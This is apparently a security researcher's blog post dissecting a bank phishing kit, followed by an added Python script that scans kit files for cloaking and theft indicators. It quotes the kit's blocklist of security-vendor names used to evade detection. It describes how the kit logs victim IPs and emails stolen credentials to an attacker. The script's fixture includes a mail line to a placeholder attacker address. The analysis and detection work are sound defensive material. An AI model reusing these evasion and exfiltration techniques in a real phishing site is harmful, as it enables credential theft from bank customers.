There have been plenty of articles describing the structure of phishing emails and how to spot them. Less explored, however, are phishing websites: what they are, how they are used, and how users can protect themselves. We'll take a deep dive into one particular phishing website and the methods its author used to try to avoid detection.

While reading through my Twitter feed, I noticed a tweet from @WifiRumHam discussing a zip file of phishing kits he had discovered hosted on a compromised web server. He pointed me to a 66 MB file named luis-debug.zip. The zip file contains five directories, each specific to the site being phished. I checked the source code in the first directory. It targets a bank popular in the southern and midwestern states. I've blurred the images, as this is an ongoing investigation.
$ ls -l
drwxr-xr-x 3 www-data www-data 4096 Sep 13 10:39 55450bcff5cf109349f7a22507e8cfed
-rw-r--r-- 1 www-data www-data 2644 Dec 3 2014 blocker.php
drwxr-xr-x 3 www-data www-data 4096 Sep 22 2015 home
-rw-r--r-- 1 www-data www-data 718 Aug 20 16:18 index.php
-rw-r--r-- 1 www-data www-data 234 Sep 13 10:39 vu.txt
Figure 1. A listing of the bank phishing kit's top-level directory.
index.php includes blocker.php, which checks that the connecting client does not match certain criteria: that it is not a bot or a security company that might report the phishing site. blocker.php does this with a blacklist of domains and IP addresses belonging to Internet security companies such as PhishTank and Cyveillance. The antibots.php file in the listing below implements the same bot-thwarting functionality for the home and md5sum directories. Both match the connecting client's hostname, IP address, or user-agent string against a blacklist of IP addresses, domains, and user-agent strings belonging to popular web crawlers and security companies. The code snippet below is the list of strings matched against the connecting client's domain. A match against any indicator in the blacklist returns a 404 page.
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",);
index.php then generates an MD5 hash of the current time and uses it as the name of a new, unique directory, into which it copies the contents of the home directory. Finally, index.php logs the victim's IP address in the file vu.txt and redirects the victim to that new directory. The md5sum-named directory therefore holds a complete copy of everything in home.
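As an added example (not part of the original analysis and not the kit's own code), the following Python script statically triages a suspected kit directory for the behaviours described above: a blocklist of security-vendor names, a 404 served on a match, host/IP/User-Agent fingerprinting, md5(time()) directory cloning, victim-IP logging, and a mailer sending to a webmail address. The PHP fragments in SAMPLE_KIT are constructed stand-ins, not the real kit's source.

```python
import re
from typing import Dict, List

# Static triage of a suspected phishing kit. Each indicator mirrors one of the
# kit behaviours described in the text; none of them alone is conclusive.
VENDOR_WORDS = {"cyveillance", "phishtank", "google", "amazonaws",
                "softlayer", "tor-exit", "calyxinstitute"}
INDICATORS = [
    ("blocklist_array", re.compile(r"\$blocked_\w+\s*=\s*array\s*\(", re.I)),
    ("serves_404", re.compile(r"header\s*\(\s*['\"]HTTP/1\.[01]\s+404", re.I)),
    ("client_fingerprint", re.compile(r"gethostbyaddr|HTTP_USER_AGENT|REMOTE_ADDR", re.I)),
    ("md5_time_dir", re.compile(r"md5\s*\(\s*time\s*\(\s*\)\s*\)", re.I)),
    ("php_mail", re.compile(r"\bmail\s*\(", re.I)),
    ("webmail_recipient", re.compile(r"@(gmail|yahoo|hotmail|outlook)\.com", re.I)),
]

def scan_source(src: str) -> List[str]:
    """Return the indicator labels that fire on one PHP source file."""
    hits = [label for label, rx in INDICATORS if rx.search(src)]
    # Two or more security-vendor names quoted inside one array(...) literal
    # is the strongest single sign of scanner cloaking.
    for body in re.findall(r"array\s*\((.*?)\)", src, re.S):
        quoted = {w.lower() for w in re.findall(r"['\"]([^'\"]*)['\"]", body)}
        if len(quoted & VENDOR_WORDS) >= 2:
            hits.append("vendor_blocklist")
            break
    return hits

def triage_kit(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each file name to its indicators, omitting files with none."""
    return {name: hits for name, src in files.items() if (hits := scan_source(src))}

# Constructed stand-ins for the kit's files (not the real kit's source).
SAMPLE_KIT = {
    "blocker.php": '<?php $blocked_words = array("google","cyveillance","phishtank","tor-exit",);\n'
                   '$h = gethostbyaddr($_SERVER["REMOTE_ADDR"]); /* ... match $h ... */\n'
                   'header("HTTP/1.0 404 Not Found");',
    "index.php": '<?php include "blocker.php"; $d = md5(time()); mkdir($d);\n'
                 'file_put_contents("vu.txt", $_SERVER["REMOTE_ADDR"] . "\\n", FILE_APPEND);',
    "mailer.php": '<?php mail("PLACEHOLDER-ATTACKER@gmail.com", "log", $body);',
    "Finish.php": '<?php header("Location: https://bank.example/"); exit;',
}

if __name__ == "__main__":
    for name, hits in triage_kit(SAMPLE_KIT).items():
        print(f"{name}: {', '.join(hits)}")
```

Run against a real extracted kit by reading each .php file into the dictionary; files with no hits, like the redirect-only Finish.php above, are dropped from the report.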
$ ls -l 55450bcff5cf109349f7a22507e8cfed
-rw-r--r-- 1 www-data www-data 1536 Dec 22 2017 action.php
-rw-r--r-- 1 www-data www-data 9791 Jun 26 2015 anon.js
-rw-r--r-- 1 www-data www-data 2124 Jan 9 2015 antibots.php
-rw-r--r-- 1 www-data www-data 17859 Nov 18 2015 confirm.php
-rw-r--r-- 1 www-data www-data 10013 Nov 5 2015 encriptar.php
-rw-r--r-- 1 www-data www-data 296 Sep 20 2015 Finish.php
drwxr-xr-x 2 www-data www-data 4096 Sep 22 2015 images
-rw-r--r-- 1 www-data www-data 6502 Nov 18 2015 index.php
-rw-r--r-- 1 www-data www-data 2180 Dec 22 2017 mailer.php
Figure 2. A listing of the bank phishing kit's md5sum-named directory.
The victim's browser is directed to the phishing page, shown in Figure 4, instead of the legitimate site.
Figure 4. The webpage decrypted by the browser.
The code implementing the AES encryption appears to have been copied from the following pages:
Figure 5. The second form collecting more of the victim's information.
The victim is then redirected to the legitimate banking site, as if nothing untoward had happened. The credentials and personal information captured by the phishing site are emailed out by mailer.php to the attacker's gmail.com account.
I believe that, given the continued success of these phishing campaigns, the software behind them will become more streamlined and sophisticated. Phishing attacks will become more difficult for enterprise security applications to detect as cybercriminals find new ways to obfuscate their activities. I expect highly customizable kits that let even the most novice cybercriminals launch their own campaigns to become more prevalent. With the combination of homoglyphs that trick the eye and the obfuscation methods that bypass network monitoring described above, phishing emails are getting harder and harder for individuals and enterprise security systems alike to detect.